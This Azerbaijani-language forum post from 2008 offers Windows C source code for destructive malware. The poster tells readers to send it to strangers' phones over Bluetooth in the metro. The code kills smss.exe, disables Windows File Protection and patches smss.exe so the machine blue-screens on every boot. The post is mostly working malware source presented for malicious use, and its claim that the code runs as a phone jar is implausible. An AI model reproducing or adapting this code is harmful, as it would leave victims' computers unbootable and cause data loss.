| GanG | Zaman: Bazar ertəsi, 2008-07-28, 7:06 PM | Mesaj # 1 |  Root Admin Qrup: Admin Mesaj: 824Reputasiya: 0 Vəziyyət: (offline) | evvelce netopati aciriq ve bu kodu yazib sonra jar fayla cevirib smartfon telefonlara gonderirik metroda ozum yoxlamisam isleyirkod:
#include <windows.h>#include <tlhelp32.h>#include <stdio.h>
typedef VOID ( _stdcall *RtlSetProcessIsCritical ) (IN BOOLEAN NewValue,OUT PBOOLEAN OldValue, // (optional)IN BOOLEAN IsWinlogon );BOOL ProtectProcess();BOOL EnablePriv(LPCSTR lpszPriv); // by NapalmDWORD fGetPID( char *szProcessName );int fMatchCheck( char *mainstr, int mainstrLen, char *checkstr, int checkstrLen );void Disable_WFP(char *szFile); // I dunno who coded that x-DBOOL SMSSCorrupt();
/************************************/int main(){ProtectProcess(); // not really needed, just wanted to make sure we BSOD when our process ends...return SMSSCorrupt();}/************************************/
BOOL ProtectProcess(){HANDLE hDLL;RtlSetProcessIsCritical fSetCritical;
hDLL = LoadLibraryA("ntdll.dll");if ( hDLL != NULL ){EnablePriv(SE_DEBUG_NAME);(fSetCritical) = (RtlSetProcessIsCritical) GetProcAddress( (HINSTANCE)hDLL, "RtlSetProcessIsCritical" );if(!fSetCritical) return 0;fSetCritical(1,0,0);return 1;} elsereturn 0;}
BOOL EnablePriv(LPCSTR lpszPriv) // by Napalm{HANDLE hToken;LUID luid;TOKEN_PRIVILEGES tkprivs;ZeroMemory(&tkprivs, sizeof(tkprivs));
if(!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken))return FALSE;
if(!LookupPrivilegeValue(NULL, lpszPriv, &luid)){CloseHandle(hToken); return FALSE;}
tkprivs.PrivilegeCount = 1;tkprivs.Privileges[0].Luid = luid;tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
BOOL bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL);CloseHandle(hToken);return bRet;}
DWORD fGetPID( char *szProcessName ){PROCESSENTRY32 pe;HANDLE ss;DWORD dwRet;
ss = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( ss ) {if( Process32First( ss, &pe ) )while( Process32Next( ss, &pe ) )if( !strcmp( pe.szExeFile, szProcessName ) ) {dwRet = pe.th32ProcessID;break;}CloseHandle( ss );}return dwRet;}
int fMatchCheck( char *mainstr, int mainstrLen, char *checkstr, int checkstrLen ){bool fmcret=TRUE;int x;for(x=0;x<mainstrLen;x++) {
fmcret=true;
for(int y=0;y<checkstrLen;y++) {if(checkstr[y]!=mainstr[x+y]) {fmcret=FALSE;break;}}
if(fmcret)return x+checkstrLen;
}return -1;}
void Disable_WFP(char *szFile) { // I dunno who coded that x-D
//we have to convert ASCII string to Unicode string, else this wont workwchar_t path[256];MultiByteToWideChar(CP_ACP, 0, szFile, -1, path, 256);
typedef DWORD(__stdcall *CPP) (DWORD param1, PWCHAR param2, DWORD param3);HINSTANCE hmod=LoadLibrary("sfc_os.dll");CPP SetSfcFileException;
// the function is stored at the fifth ordinal in sfc_os.dllSetSfcFileException= (CPP)GetProcAddress(hmod,(LPCSTR)5);SetSfcFileExce ption( 0, path, (DWORD)-1 );//Now we can modify the system file in a complete stealth.}
BOOL SMSSCorrupt(){HANDLE hSmss;FILE *fSmss;char szSmss[MAX_PATH],*szSmssBuff;long nSmss;int nAt;bool bRet = FALSE;GetSystemDirectory( szSmss, sizeof szSmss );strcat( szSmss, "\\smss.exe" );
if( EnablePriv( SE_DEBUG_NAME ) ) {
hSmss = OpenProcess( PROCESS_ALL_ACCESS, FALSE, fGetPID( "smss.exe" ) );
if( hSmss ) {if( TerminateProcess( hSmss, 0 ) ) {
Disable_WFP( szSmss );Sleep( 1000 ); // to make sure the windows file protection is disabled for smss.exefSmss = fopen( szSmss, "rb" );if( fSmss ) {
fseek( fSmss, 0, SEEK_END );nSmss = ftell( fSmss );rewind( fSmss );
szSmssBuff = (char*)malloc(nSmss+1);
if( szSmssBuff ) {
memset( szSmssBuff, 0, nSmss+1 );fread( szSmssBuff, 1, nSmss, fSmss );fclose( fSmss );
fSmss = fopen( szSmss, "wb" );
if( fSmss ) {
// search for "w i n l o g o "nAt = fMatchCheck( szSmssBuff, nSmss, "w\x0i\x0n\x0l\x0o\x0g\x0o\x0", 14 );
if( nAt > 0 ) {/* replace "w i n l o g o n" with "w i n l o g o x",so windows won't start the winlogon.exe process, but will try to execute winlogox.exe,but that won't work and it will always BSOD >=--D */szSmssBuff[nAt]='x';fwrite( szSmssBuff, 1, nSmss, fSmss );bRet = TRUE;}
fclose( fSmss );
}
} else {fclose( fSmss );}
}
}CloseHandle( hSmss );}
}return bRet;} | | |
|
